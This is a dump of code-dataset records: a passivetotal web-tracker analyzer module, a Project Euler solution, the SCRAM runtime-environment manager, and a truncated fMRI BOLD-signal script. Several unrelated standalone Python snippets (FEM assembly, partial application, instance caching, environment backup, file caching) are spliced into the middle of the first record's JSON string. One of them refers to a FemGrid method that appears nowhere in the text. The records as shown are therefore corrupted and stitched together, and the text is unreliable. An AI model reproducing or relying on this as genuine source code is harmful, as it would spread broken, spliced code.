api_response.get('firstSeen')\n self._lastseen = api_response.get('lastSeen')\n self._value = api_response.get('attributeValue')\n self._trackertype = api_response.get('attributeType')\n self._hostname = api_response.get('hostname')\n self._query = query\n \n def __str__(self):\n return '[{0.trackertype}] \"{0.value}\" ({0.firstseen_date} to {0.lastseen_date})'.format(self)\n \n def __repr__(self):\n return ''.format(self)\n \n def _get_dict_fields(self):\n return ['str:firstseen','str:lastseen','value','trackertype','hostname']\n \n def to_dataframe(self):\n \"\"\"Render this object as a Pandas DataFrame.\n\n :rtype: :class:`pandas.DataFrame`\n \"\"\"\n pd = self._get_pandas()\n cols = ['query','firstseen','lastseen','trackertype','value','hostname']\n as_d = {\n 'query': self._query,\n 'firstseen': self.firstseen,\n 'lastseen': self.lastseen,\n 'trackertype': self.trackertype,\n 'value': self.value,\n 'hostname': self.hostname,\n }\n return pd.DataFrame([as_d], columns=cols)\n\n @property\n def value(self):\n \"\"\"Value of the tracker.\"\"\"\n return self._value\n\n @property\n def hostname(self):\n \"\"\"Hostname the tracker was observed on.\"\"\"\n return self._hostname\n\n @property\n def trackertype(self):\n \"\"\"Type or category of web tracker.\"\"\"\n return self._trackertype\n \n @property\n def category(self):\n \"\"\"Category or type of web tracker; alias of `TrackerRecord.trackertype`.\"\"\"\n return self._trackertype\n \n @property\n def tracker(self):\n \"\"\"Tracker as a `Tracker` object to aid pivoting to other related IPs or hosts.\n \n :rtype: :class:`passivetotal.analyzer.trackers.Tracker`\n \"\"\"\n return Tracker(self.trackertype, self.value)\n\n\n\nclass TrackerSearchResults(RecordList, PagedRecordList, ForPandas, FilterDomains):\n\n \"\"\"Search results from a tracker query.\"\"\"\n\n def __init__(self, query=None, tracker_type=None, search_type=None):\n self._query = query\n self._tracker_type = tracker_type\n self._search_type = search_type\n 
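# The element-to-global assembly loop from FemGrid.setGlobalMatrixAndVector a little earlier,
# restated with NumPy for a small 1D mesh. The ke/fe values are made up; the point is that
# overlapping 2x2 element blocks accumulate into a tridiagonal global system.
import numpy as np

nh = 4                                        # number of nodes
ke = np.array([[1.0, -1.0], [-1.0, 1.0]])     # local stiffness matrix (hypothetical values)
fe = np.array([0.5, 0.5])                     # local load vector (hypothetical values)

K = np.zeros((nh, nh))
F = np.zeros(nh)
for i in range(nh - 1):                       # one element between nodes i and i+1
    K[i:i + 2, i:i + 2] += ke
    F[i:i + 2] += fe

print(K)   # interior diagonal entries are 2.0 because two elements share each interior node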
self._records = []\n self._totalrecords = None\n self._pagination_current_page = 0\n self._pagination_page_size = 2000 # API is fixed at this page size\n self._pagination_has_more = True\n self._pagination_callable = partial(\n get_api('Trackers').search_trackers,\n value=self._query, \n tracker_type=self._tracker_type, \n result_type=self._search_type\n )\n\n def _get_shallow_copy_fields(self):\n return ['_totalrecords','_query', '_pagination_current_page','_pagination_page_size',\n '_pagination_callable','_pagination_has_more']\n \n def _get_sortable_fields(self):\n return ['firstseen','lastseen','searchtype','trackertype','query','host']\n \n def _get_dict_fields(self):\n return ['totalrecords']\n \n def _pagination_parse_page(self, api_response):\n self._totalrecords = api_response.get('totalRecords')\n results = api_response['results']\n self._records.extend([\n TrackerSearchRecord(r, self._query, self._tracker_type, self._search_type) for r in results\n ])\n \n @property\n def as_dict(self):\n d = super().as_dict\n return d\n \n @property\n def query(self):\n \"\"\"Query used to return this set of search results.\"\"\"\n return self._query\n \n @property\n def totalrecords(self):\n \"\"\"Total number of available records; may be greater than the number of results returned by the API.\"\"\"\n return self._totalrecords\n\n\n\nclass TrackerSearchRecord(Record, FirstLastSeen, ForPandas):\n\n \"\"\"Record representing a single search result in a tracker search.\"\"\"\n\n def __init__(self, api_response, query=None, tracker_type=None, search_type=None):\n self._firstseen = api_response.get('firstSeen')\n self._lastseen = api_response.get('lastSeen')\n self._query = query\n self._trackertype = tracker_type\n self._searchtype = search_type\n self._entity = api_response.get('entity',None)\n \n def __str__(self):\n return '[{0.trackertype}] @ \"{0.entity}\" ({0.firstseen_date} to {0.lastseen_date})'.format(self)\n \n def __repr__(self):\n return ' {0.entity}\">'.format(self)\n \n def _get_dict_fields(self):\n return ['str:firstseen','str:lastseen','query','str:host','trackertype','searchtype']\n \n def to_dataframe(self):\n \"\"\"Render this object as a Pandas DataFrame.\n\n :rtype: :class:`pandas.DataFrame`\n \"\"\"\n pd = self._get_pandas()\n cols = ['query','host','trackertype','firstseen','lastseen','searchtype']\n as_d = {\n 'query': self._query,\n 'host': self.host,\n 'trackertype': self.trackertype,\n 'firstseen': self.firstseen,\n 'lastseen': self.lastseen,\n 'searchtype': self.searchtype\n }\n return pd.DataFrame([as_d], columns=cols)\n\n @property\n def entity(self):\n \"\"\"Entity where a tracker was found - typically a hostname or an IP address.\n \n Returns the actual value returned by the API in the 'entity' response field.\n \"\"\"\n return self._entity\n \n @property\n def host(self):\n \"\"\"Host where a tracker was found.\n \n Returns either an `analyzer.Hostname` or `analyzer.IPAddress` object depending on\n the type of search which produced this record.\n \"\"\"\n if self._searchtype == 'addresses':\n return get_object(self.entity, type='IPAddress')\n elif self._searchtype == 'hosts' or self._searchtype is None:\n return get_object(self.entity, type='Hostname')\n else:\n return None\n \n @property\n def query(self):\n \"\"\"Query that produced this search result.\"\"\"\n return self._query\n \n @property\n def searchtype(self):\n \"\"\"Type of search (hostnames or IP addresses) that produced this search result.\n \n This value defines the type of records returned - either 
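# The functools.partial idiom used just above: the query parameters are pre-bound to the API
# call so the shared pagination code only has to supply paging arguments later. Everything in
# this sketch is self-contained and made up (fetch_page is not the passivetotal API).
from functools import partial

def fetch_page(value, tracker_type, page):
    """Stand-in for an API call; returns (results, has_more)."""
    results = [f'{tracker_type}:{value}:{i}' for i in range(page * 2, page * 2 + 2)]
    return results, page < 1

get_page = partial(fetch_page, 'UA-12345', 'GoogleAnalyticsTrackingId')

records, page, more = [], 0, True
while more:
    batch, more = get_page(page=page)
    records.extend(batch)
    page += 1

print(len(records))   # 4 records gathered over two pages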
hostnames or IPs.\"\"\"\n return self._searchtype\n \n @property\n def trackertype(self):\n \"\"\"Type of tracker found on the entity (host) referenced in this search result.\"\"\"\n return self._trackertype\n\n @property\n def tracker(self):\n \"\"\"Tracker as a `Tracker` object to aid pivoting to other related IPs or hosts.\n \n :rtype: :class:`passivetotal.analyzer.trackers.Tracker`\n \"\"\"\n return Tracker(self.trackertype, self.value)\n\n\n\nclass Tracker:\n\n \"\"\"A web tracker with a type and value.\n \n In addition to a simple type/value mapping, this class also provides\n `ips` and `hostname` properties to find other entities that\n have the same type/value tuple.\n \"\"\"\n\n _instances = {}\n\n def __new__(cls, trackertype, value):\n valuehash = hash((trackertype, value))\n self = cls._instances.get(valuehash)\n if not self:\n self = cls._instances[valuehash] = object.__new__(cls)\n self._type = trackertype\n self._value = value\n self._ips = None\n self._hostnames = None\n return self\n \n def __str__(self):\n return '{0.trackertype}:{0.value}'.format(self)\n \n def __repr__(self):\n return ''.format(str(self))\n \n def _api_search(self, searchtype):\n attrs = {\n 'hosts': '_hostnames',\n 'addresses': '_ips'\n }\n results = TrackerSearchResults(self._value, self._type, searchtype)\n results.load_all_pages()\n setattr(self, attrs[searchtype], results)\n \n @property\n def trackertype(self):\n \"\"\"Type of tracker as defined by RiskIQ analysts.\"\"\"\n return self._type\n \n @property\n def value(self):\n \"\"\"Tracker value as observed.\"\"\"\n return self._value\n \n @property\n def observations_by_ip(self):\n \"\"\"IP addresses of hosts where this tracker was observed.\n \n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if self._ips is None:\n self._api_search('addresses')\n return self._ips\n \n @property\n def observations_by_hostname(self):\n \"\"\"Hostnames of sites where this tracker was observed.\n \n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if self._hostnames is None:\n self._api_search('hosts')\n return self._hostnames\n\n\n\nclass HasTrackers:\n\n \"\"\"An object with web tracker history.\"\"\"\n\n _REFERENCE_TRACKER_TYPES = {\n 'Hostname': ['DocumentBaseHost','HTTrackSourceHost','MarkOfTheWebSourceHost','SingleFileSourceHost'],\n 'IPAddress': ['DocumentBaseAddress','HTTrackSourceAddress','MarkOfTheWebSourceAddress','SingleFileSourceAddress']\n }\n\n def _api_get_trackers(self, start_date=None, end_date=None):\n \"\"\"Query the host attributes API for web tracker history.\n \n Only the first page of results is returned; pagination is not\n supported. 
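# The __new__-based instance cache used by the Tracker class above, reduced to a minimal
# standalone sketch: constructing the same (kind, value) pair twice hands back the same
# object, so lazily-fetched search results are shared between call sites.
class Interned:
    _instances = {}

    def __new__(cls, kind, value):
        key = hash((kind, value))
        obj = cls._instances.get(key)
        if obj is None:
            obj = cls._instances[key] = object.__new__(cls)
            obj.kind = kind
            obj.value = value
        return obj

a = Interned('GoogleAnalyticsTrackingId', 'UA-12345')
b = Interned('GoogleAnalyticsTrackingId', 'UA-12345')
print(a is b)   # True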
Check the totalrecords attribute of the response object\n to determine if more records are available.\n \"\"\"\n query=self.get_host_identifier()\n response = get_api('HostAttributes').get_trackers(\n query=query,\n start=start_date,\n end=end_date\n )\n self._trackers = TrackerHistory(response, query)\n return self._trackers\n \n def _api_get_tracker_references(self):\n \"\"\"Query the host attributes API and search trackers for multiple trackertypes and searchtypes.\"\"\"\n self._tracker_references = TrackerSearchResults(query=self.get_host_identifier())\n tracker_types = self._REFERENCE_TRACKER_TYPES.get('Hostname' if self.is_hostname else 'IPAddress')\n for trackertype in tracker_types:\n for searchtype in ['addresses','hosts']:\n try:\n result = get_api('HostAttributes').search_trackers_by_type(\n query=self.get_host_identifier(),\n type=trackertype,\n searchType=searchtype\n )\n self._tracker_references.parse(result, trackertype, searchtype)\n except AnalyzerAPIError as e:\n if e.status_code == 404:\n continue\n raise e\n return self._tracker_references\n\n @property\n def trackers(self):\n \"\"\"History of trackers observed on this host.\n\n Trackers are analytics codes, social network accounts, and other unique\n details extracted from the web page by RiskIQ crawlers based on detection\n logic programmed by RiskIQ analysts.\n\n :rtype: :class:`passivetotal.analyzer.trackers.TrackerHistory`\n \"\"\"\n if getattr(self, '_trackers', None) is not None:\n return self._trackers\n config = get_config()\n return self._api_get_trackers(\n start_date=config['start_date'],\n end_date=config['end_date']\n )\n \n @property\n def tracker_references(self):\n \"\"\"Hosts with trackers that have this host as the value.\n \n Performs several API queries to create a composite result; create an instance of\n :class:`passivetotal.analyzer.Tracker` if you need more granular control.\n\n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if getattr(self, '_tracker_references', None) is not None:\n return self._tracker_references\n return self._api_get_tracker_references()","repo_name":"passivetotal/python_api","sub_path":"passivetotal/analyzer/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":14036,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"94"} +{"seq_id":"28294409674","text":"def check(a, b, c):\n if a**2 + b**2 == c**2:\n return True\n else:\n return False\n\n\nfor a in range(1, 1000):\n for b in range(a, 1000 - a):\n c = 1000 - a - b\n if check(a, b, c):\n print(a*b*c)\n","repo_name":"lraczyn/Project-Euler","sub_path":"009.py","file_name":"009.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35580906908","text":"from os import environ, stat\nfrom os.path import exists, join, abspath\nfrom sys import stdout\nimport re\nfrom base64 import b64decode, b64encode\nfrom json import dump, load\nimport SCRAM\nfrom SCRAM.BuildSystem.ToolManager import ToolManager\n\n\nRUNTIME_SHELLS = {'-sh': 'BOURNE', '-csh': 'TCSH', '-win': 'CYGWIN'}\nORIG_SCRAM_ARCH = ''\ntry:\n ORIG_SCRAM_ARCH = environ['SCRAM_ARCH']\nexcept:\n pass\n\nclass RuntimeEnv(object):\n def __init__(self, area):\n self.recursive = True if 'SCRAM_RTBOURNE_SET' in environ else False\n self.optional_paths = {}\n self.area = area\n for e in [i for i in environ.keys() if i.startswith('SCRAMV3_BACKUP_')] :\n environ[e[15:]] = environ[e]\n del 
environ[e]\n self.OENV = environ.copy()\n self.OENV['SCRAM_ARCH'] = ORIG_SCRAM_ARCH\n self.env_backup_prefix = 'SRT_'\n self.skip_env = re.compile('^(_|PWD|PROMPT_COMMAND|SCRAM_.+|SCRAMV1_.+|SCRAM|LOCALTOP|RELEASETOP|BASE_PATH)$')\n self.shell = {}\n self.shell['BOURNE'] = {'EQUALS': '=', 'SEP': ':', 'EXPORT': 'export', 'UNEXPORT': 'unset'}\n self.shell['TCSH'] = {'EQUALS': ' ', 'SEP': ':', 'EXPORT': 'setenv', 'UNEXPORT': 'unsetenv'}\n self.shell['CYGWIN'] = {'EQUALS': '=', 'SEP': ';', 'EXPORT': 'unset', 'UNEXPORT': 'set'}\n self.shell['RTBOURNE'] = self.shell['BOURNE']\n self.env = {'variables': {}, 'paths': {}}\n self.force_tools_env = {}\n self.skip_runtime = {}\n self._unsetenv = False\n self.ignore_env = {}\n self._read_ignore_env()\n return\n\n def runtimebuildenv(self):\n save_env = {}\n environ[\"SCRAM_RUNTIME_TYPE\"]=\"BUILD\"\n for k in ['LD_PRELOAD']:\n if k in environ:\n save_env[k] = environ[k]\n del environ[k]\n self.save('RTBOURNE')\n for k, v in save_env.items():\n if k in self.ignore_env: continue\n environ[k] = v\n self.setenv(\"RTBOURNE\")\n if 'rtstring' in self.env:\n if 'RTBOURNE' in self.env['rtstring']:\n for e in self.env['rtstring']['RTBOURNE']:\n if e in self.ignore_env: continue\n environ[e] = self.env['rtstring']['RTBOURNE'][e]\n return environ\n\n def _fixpathvar(self, var, sep):\n if (var in environ) and (environ[var] != ''):\n return '%s%s' % (sep, environ[var])\n return ''\n\n def _fixlibenv(self, var):\n if environ['SCRAM_ARCH'].startswith('osx') and var == 'LD_LIBRARY_PATH':\n var = 'DYLD_FALLBACK_LIBRARY_PATH'\n return var\n\n def setenv(self, shell, ostream=None):\n if self.recursive:\n return\n if not ostream:\n ostream = stdout\n shell_data = self.shell[shell]\n sep = shell_data['SEP']\n udata = {}\n data = []\n if not self._unsetenv:\n env_prefix = self.env_backup_prefix\n env = self._runtime()\n for d in env['variables']:\n for var, val in d.items():\n udata[var] = 1\n data.append({var: val[0]})\n for var in env['path']:\n if '_SRTOPT_' in var:\n continue\n udata[var] = 1\n benv = '%s%s%s' % (env_prefix, var, self.backup_type[var])\n val = self._fixpathvar(var, sep)\n if benv in environ:\n val = environ[benv] + val\n data.append({var: val})\n if shell == 'RTBOURNE':\n data.append({'SCRAM_RTBOURNE_SET': environ['SCRAMRT_SET']})\n for var, val in env['xenv'].items():\n udata[var] = 1\n data.append({var: val})\n for var, val in environ.items():\n if var not in udata:\n data.insert(0, {var: val})\n udata[var] = 1\n oenv = self.OENV\n unset = \"\"\n unset_vars = \"\"\n for v in oenv:\n if v in udata:\n continue\n if v in environ:\n del environ[v]\n if shell == 'RTBOURNE':\n continue\n unset += \" %s\" % v\n if not v.startswith('SCRAMRT_') and \\\n not v.endswith('_SCRAMRT') and \\\n not v.endswith('_SCRAMRTDEL'):\n unset_vars += \" %s\\n\" % v\n if unset:\n if unset_vars and not self._unsetenv:\n SCRAM.printerror(\"**** Following environment variables are going to be unset.\\n%s\" % unset_vars)\n print(\"%s %s;\" % (shell_data['UNEXPORT'], unset), file=ostream)\n for d in data:\n for var, val in d.items():\n if var in self.ignore_env: continue\n environ[var] = val\n if shell == 'RTBOURNE': continue\n if var != 'PATH' and var in oenv:\n if val == oenv[var]:\n continue\n print('%s %s%s\\\"%s\\\";' % (shell_data['EXPORT'], var,\n shell_data['EQUALS'], val), file=stdout)\n return True\n\n def save(self, shell, ostream=None):\n if self.recursive:\n return\n if not ostream:\n ostream = stdout\n if 'SCRAMRT_SET' in environ:\n self._restore_environment(shell)\n 
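# The SRT_-prefixed bookkeeping that setenv() reads above (and that save() fills in below),
# shrunk to one variable. The backup records what the runtime itself prepended, so a later
# restore can strip exactly that fragment out again. Names and values are illustrative only,
# and the real code also handles separators at either end and variables that did not exist.
import os

var, backup = 'MY_TOOL_PATH', 'SRT_MY_TOOL_PATH_SCRAMRT'
os.environ[var] = '/usr/bin'                          # inherited from the parent shell

added = '/opt/tool/bin:/opt/tool/scripts'
os.environ[backup] = added                            # remember what the runtime adds
os.environ[var] = added + ':' + os.environ[var]       # activate the runtime environment

# restore: drop the recorded fragment, keeping anything the user set in the meantime
os.environ[var] = os.environ[var].replace(os.environ.pop(backup) + ':', '')
print(os.environ[var])   # /usr/bin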
env_prefix = self.env_backup_prefix\n env = self._runtime()\n data = []\n sep = self.shell[shell]['SEP']\n backup_vars = \"\"\n for h in env['variables']:\n for (name, value) in h.items():\n if name in self.ignore_env: continue\n btype = '_SCRAMRT'\n if name not in environ:\n btype += 'DEL'\n else:\n backup_vars += \"%s=%s;\" % (name, environ[name])\n data.append({'%s%s%s' % (env_prefix, name, btype): value[0]})\n if backup_vars:\n backup_vars = backup_vars.strip(';')\n data.append({'SCRAMRT_BACKUP_ENV': b64encode(backup_vars.encode('utf-8')).decode('utf-8')})\n self.backup_type = {}\n opt = {}\n regexp = re.compile('^(.+?)_SRTOPT_(.+)$')\n for (name, value) in env['path'].items():\n m = regexp.match(name)\n if m:\n if m.group(2) in self.ignore_env: continue\n if m.group(1) in self.optional_paths:\n if not m.group(2) in opt:\n opt[m.group(2)] = {}\n opt[m.group(2)][m.group(1)] = 1\n continue\n btype = '_SCRAMRT'\n if name not in environ:\n btype += 'DEL'\n data.append({'%s%s%s' % (env_prefix, name, btype): self._cleanpath(sep.join(value), sep)})\n self.backup_type[name] = btype\n for v in opt:\n btype = ''\n nbtype = ''\n if v in self.backup_type:\n btype = self.backup_type[v]\n nbtype = btype\n else:\n nbtype = '_SCRAMRT'\n if v in environ:\n nbtype += 'DEL'\n for t in opt[v]:\n xindex = len(data)\n pval = ''\n if btype:\n k = '%s%s%s' % (env_prefix, v, btype)\n i = -1\n for d in data:\n i += 1\n if k not in d:\n continue\n xindex = i\n pval = d[k]\n break\n nval = sep.join(env['path']['%s_SRTOPT_%s' % (t, v)])\n if pval:\n nval = '%s%s%s' % (nval, sep, pval)\n if xindex == len(data):\n data.append({})\n data[xindex]['%s%s%s' % (env_prefix, v, nbtype)] = self._cleanpath(nval, sep)\n scram_set = ''\n for e in ['SCRAM_PROJECTNAME', 'SCRAM_PROJECTVERSION', 'SCRAM_ARCH', 'SCRAM_VERSION']:\n scram_set += '%s:' % environ[e]\n data.append({'SCRAMRT_SET':\n '%s%s' % (scram_set, env_prefix)})\n for v in data:\n for name, value in v.items():\n environ[name] = value.replace('\"', '\\\\\"').replace('`', '\\\\`')\n return\n\n def optional_env(self, types=[]):\n self.optional_paths = {}\n for t in types:\n self.optional_paths[t.upper()] = 1\n return\n\n def unsetenv(self, shell):\n if 'SCRAMRT_SET' not in environ:\n return\n self._unsetenv = True\n self._restore_environment(shell)\n self.setenv(shell)\n self._unsetenv = False\n return\n\n def _restore_environment(self, shell):\n global environ\n penv = environ['SCRAMRT_SET'].split(':')\n del environ['SCRAMRT_SET']\n sep = self.shell[shell]['SEP']\n backup_env = environ.copy()\n prefix = self.env_backup_prefix if len(penv)<5 else penv[4]\n bvar = 'SCRAMRT_BACKUP_ENV'\n bval = {} if bvar not in environ else \\\n dict([item.split('=', 1)\n for item in b64decode(environ[bvar]).decode('utf-8').split(';')\n if item])\n for name, value in environ.items():\n if name.startswith('SCRAMRT_'):\n del backup_env[name]\n elif self.skip_env.match(name):\n continue\n elif name.endswith('_SCRAMRT') or name.endswith('_SCRAMRTDEL'):\n del backup_env[name]\n type = ''\n var = name\n if name.endswith('_SCRAMRTDEL'):\n var = name[:-11]\n type = 'DEL'\n else:\n var = name[:-8]\n if prefix:\n var = var[len(prefix):]\n if var in backup_env:\n if type == 'DEL':\n del backup_env[var]\n continue\n val = backup_env[var]\n if var in bval:\n val = bval[var]\n elif val == value:\n val = ''\n else:\n regex = re.compile('^(.*?%s|)%s(%s.*|)$' % (sep, re.escape(value), sep))\n m = regex.match(val)\n if m:\n val = '%s%s' % (m.group(1), m.group(2))\n val = val.strip(sep)\n val = 
val.replace('%s%s' % (sep, sep), sep)\n if not val:\n del backup_env[var]\n else:\n backup_env[var] = val\n for e in backup_env:\n environ[e] = backup_env[e]\n for e in list(environ.keys()):\n if not e in backup_env:\n del environ[e]\n\n def _update_overrides(self):\n if 'PATH' in self.env['rtstring']['path']:\n override = join(SCRAM.BASEPATH, 'share', 'overrides', 'bin')\n if exists(override):\n self.env['rtstring']['path']['PATH'].insert(0, override)\n override = join(SCRAM.BASEPATH, 'share', 'overrides', 'python')\n if exists(override):\n for v in [\"PYTHONPATH\", \"PYTHON27PATH\", \"PYTHON3PATH\"]:\n if v in self.env['rtstring']['path']:\n self.env['rtstring']['path'][v].insert(0, override)\n for e in [\"PATH\", \"LD_LIBRARY_PATH\", \"PYTHONPATH\", \"PYTHON27PATH\", \"PYTHON3PATH\"]:\n if e not in self.env['rtstring']['path']:\n continue\n ev = \"SCRAM_PREFIX_%s\" % e\n if ev not in self.OENV:\n continue\n for override in self.OENV[ev].split(\":\"):\n if exists(override):\n self.env['rtstring']['path'][e].insert(0, override)\n if 'SCRAM_IGNORE_RUNTIME_HOOK' not in self.OENV:\n self._runtime_hooks()\n if 'SCRAM_IGNORE_SITE_RUNTIME_HOOK' not in self.OENV:\n self._runtime_hooks(SCRAM.get_site_hooks())\n return\n\n def _runtime_hooks(self, hook_dir=None):\n if not hook_dir: hook_dir = self.area.config()\n debug='SCRAM_HOOKS_DEBUG' in self.OENV\n hook = join(hook_dir, 'SCRAM', 'hooks', 'runtime-hook')\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK: %s\" % hook)\n if not exists(hook):\n return\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK: Found\")\n regexp = re.compile(\n '^runtime:((path:(append|prepend|remove|replace):[a-zA-Z0-9-_]+)|(variable:[a-zA-Z0-9-_]+))=(.*)$',\n re.I)\n err, out = SCRAM.run_command('SCRAMRT_SET=true %s 2>&1' % hook)\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK:\\n%s\" % out)\n for line in out.split('\\n'):\n if not regexp.match(line):\n continue\n vals = line.split('=', 1)\n items = vals[0].split(':')\n vtype = items[1].lower()\n if vtype == 'path':\n if vtype not in self.env[\"rtstring\"]:\n self.env[\"rtstring\"][vtype] = {}\n cache = self.env[\"rtstring\"][vtype]\n vtype = items[2].lower()\n evar = items[3]\n if (vtype == 'replace'):\n xitems = vals[1].split(\"=\", 1)\n vals[1] = xitems[0]\n vals.append(xitems[1])\n elif (vtype != 'remove') and (evar not in cache):\n cache[evar] = []\n for d in vals[1].split(':'):\n d = d.strip()\n if not d:\n continue\n if vtype == 'append':\n cache[evar].append(d)\n elif vtype == 'prepend':\n cache[evar].insert(0, d)\n elif vtype == 'remove':\n if d in cache[evar]:\n cache[evar].remove(d)\n elif vtype == 'replace':\n npath = []\n for x in cache[evar]:\n if x != d:\n npath.append(x)\n else:\n for r in vals[2].split(\":\"):\n npath.append(r)\n cache[evar] = npath\n elif vtype == 'variable':\n if 'variables' not in self.env['rtstring']:\n self.env['rtstring']['variables'] = []\n found = False\n for i, val in enumerate(self.env['rtstring']['variables']):\n if items[2] in val:\n val[items[2]] = [vals[1]]\n found = True\n break\n if not found:\n self.env['rtstring']['variables'].append({items[2]: [vals[1]]})\n return\n\n def _runtime(self):\n if 'rtstring' in self.env:\n return self.env['rtstring']\n self.env['rtstring'] = {'variables': [], 'path': {}, 'RTBOURNE': {}, 'xenv': {}}\n cache = join(self.area.archdir(), 'RuntimeCache.json')\n if exists(cache):\n st = stat(cache)\n if (st.st_size > 0):\n toolcache = self.area.toolcachename()\n if st.st_mtime >= stat(toolcache).st_mtime:\n with open(cache) as ref:\n self.env['rtstring'] = 
load(ref)\n self._update_overrides()\n return self.env['rtstring']\n toolmanager = ToolManager(self.area)\n tools = toolmanager.loadtools()\n otools = toolmanager.toolsdata()\n self.force_tools_env = {'self': 1, environ['SCRAM_PROJECTNAME'].lower(): 1}\n self.skip_runtime = {}\n if 'self' in tools:\n stool = tools['self']\n otools.append(stool)\n if 'FLAGS' in stool:\n for f in ['NO_EXTERNAL_RUNTIME', 'SKIP_TOOLS_SYMLINK', 'DEFAULT_COMPILER']:\n if f not in stool['FLAGS']:\n continue\n if f == 'NO_EXTERNAL_RUNTIME':\n for x in stool['FLAGS'][f]:\n x = self._fixlibenv(x)\n self.skip_runtime[self._fixlibenv(x)] = 1\n elif f == 'SKIP_TOOLS_SYMLINK':\n for t in stool['FLAGS'][f]:\n self.force_tools_env[t.lower()] = 1\n elif f == 'DEFAULT_COMPILER':\n self.env['rtstring']['RTBOURNE'][f] = stool['FLAGS'][f][0]\n compilertools = []\n for t in otools[::-1]:\n if 'SCRAM_COMPILER' in t:\n compilertools.append(t)\n else:\n self._toolenv(t)\n for t in compilertools:\n self._toolenv(t)\n for k in list(self.env):\n if k != 'rtstring':\n del self.env[k]\n try:\n with open(cache, 'w') as ref:\n dump(self.env['rtstring'], ref, sort_keys=True, indent=2)\n except (OSError, IOError) as e:\n pass\n self._update_overrides()\n return self.env['rtstring']\n\n def _toolenv(self, tool):\n tname = tool['TOOLNAME']\n if (tname != 'self') and ('FLAGS' in tool) and ('SKIP_TOOL_SYMLINKS' in tool['FLAGS']):\n self.force_tools_env[tname] = 1\n if ('RUNTIME' not in tool) or \\\n not tool['RUNTIME']:\n return\n projTool = True if tname == environ['SCRAM_PROJECTNAME'].lower() else False\n gmake = \"\"\n for trtvar, trtval in tool['RUNTIME'].items():\n if trtvar in self.ignore_env: continue\n if trtvar.startswith('PATH:'):\n var = trtvar[5:]\n if var in self.ignore_env: continue\n if projTool and environ['SCRAM_ARCH'].startswith('osx') and \\\n var == 'DYLD_LIBRARY_PATH':\n var = 'LD_LIBRARY_PATH'\n var = self._fixlibenv(var)\n if var not in self.env['rtstring']['path']:\n self.env['rtstring']['path'][var] = []\n self.env['paths'][var] = {}\n for val in trtval:\n if tname == 'gmake' and var == 'PATH' and \\\n gmake == '' and exists(join(val, 'gmake')):\n gmake = val + \"/\"\n self.env['rtstring']['xenv']['SCRAM_GMAKE_PATH'] = gmake\n if (var not in self.skip_runtime) or (tname in self.force_tools_env):\n if val not in self.env['paths'][var]:\n self.env['paths'][var][val] = 1\n self.env['rtstring']['path'][var].append(val)\n elif trtvar not in self.env['variables']:\n self.env['rtstring']['variables'].append({trtvar: trtval})\n\n def _read_ignore_env(self):\n if not 'HOME' in environ: return\n env_file = join(environ[\"HOME\"], \".scramrc\", \"runtime\")\n if not exists(env_file): return\n ignore_env = \"\"\n with open(env_file) as f_in:\n for line in f_in.readlines():\n line = line.strip()\n if not line or line.startswith(\"#\"):\n continue\n items = line.split(\":\", 1)\n if (len(items)==2) and (items[0]==\"ignore\"):\n for e in [ x for x in items[1].split(\" \") if x]:\n ignore_env += \" %s\\n\" % e\n self.ignore_env[e] = 1\n if ignore_env:\n SCRAM.printerror(\"**** Following environment variables are ignored via ~/.scramrc/runtime and will not be set/changed.\\n%s\" % ignore_env)\n return\n\n\n def _cleanpath(self, path, sep):\n upath = {}\n opath = []\n for p in path.split(sep):\n p = abspath(p)\n if not p:\n continue\n while '/./' in p:\n p = p.replace('/./', '/')\n while '//' in p:\n p = p.replace('//', '/')\n while p.endswith('/.'):\n p = p[:-2]\n if not p:\n p = '/'\n if p not in upath:\n upath[p] = 1\n 
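# The mtime-guarded JSON cache used by _runtime() above, as a generic helper. File names and
# the rebuild callable are hypothetical; the cache is only trusted when it is non-empty and at
# least as new as the source it was derived from, otherwise it is rebuilt and rewritten.
import json
import os

def cached_build(cache_path, source_path, rebuild):
    if os.path.exists(cache_path) and os.path.getsize(cache_path) > 0 \
            and os.path.getmtime(cache_path) >= os.path.getmtime(source_path):
        with open(cache_path) as ref:
            return json.load(ref)
    data = rebuild()
    try:
        with open(cache_path, 'w') as ref:
            json.dump(data, ref, sort_keys=True, indent=2)
    except OSError:
        pass                                  # read-only install area: skip caching
    return data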
opath.append(p)\n return sep.join(opath)\n","repo_name":"cms-sw/SCRAM","sub_path":"SCRAM/Core/RuntimeEnv.py","file_name":"RuntimeEnv.py","file_ext":"py","file_size_in_byte":20420,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"28800899096","text":"import os\nimport pandas as pd\nfrom bids import BIDSLayout\n\nimport boldsignals as bold\nimport process_connectome as pc\nimport lib\n\nimport importlib\n\nimportlib.reload(lib)\nimportlib.reload(bold)\nimportlib.reload(pc)\n\npd.options.mode.chained_assignment = None\n\n# %%\n# Lecture du format BIDS\ndataset_name = 'lightduo_sample'\nderivatives_path = os.path.abspath(r'datasets_sample\\lightduo-preproc-fmriprep')\nlayout = BIDSLayout(derivatives_path, index_metadata=True, reset_database=False, validate=False,\n config=[\"bids\", \"derivatives\"])\n\natlas_name = 'CAB-NP'\natlas_path = os.path.abspath(r'..\\..\\atlas\\CAB-NP_volumetric\\CAB-NP_volumetric_liberal.nii.gz')\n\nconfounds_strategies = 'compcor'\n# %%\n\nsubjects_id_list = layout.get_subjects()\ndirectory = 'timeSeries_files'\nsub_dir = os.path.join(directory, dataset_name, atlas_name)\nif not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n\nbold_signals_config = pd.DataFrame(columns=subjects_id_list, index=['path', 'nlevels'])\ninfo_csv_path = os.path.join(sub_dir, 'bold_signals_config.csv')\n\n\n# %%\nfor subj_id in subjects_id_list:\n runs_bidsfiles_per_subjects = layout.get(subject=subj_id, suffix='bold', scope='derivatives', extension='nii.gz')\n runs_bidsfiles_ids_list_per_subject = []\n bold_signals_list_per_subject = []\n tr_runs_per_subject = []\n\n for run_bidsfile in 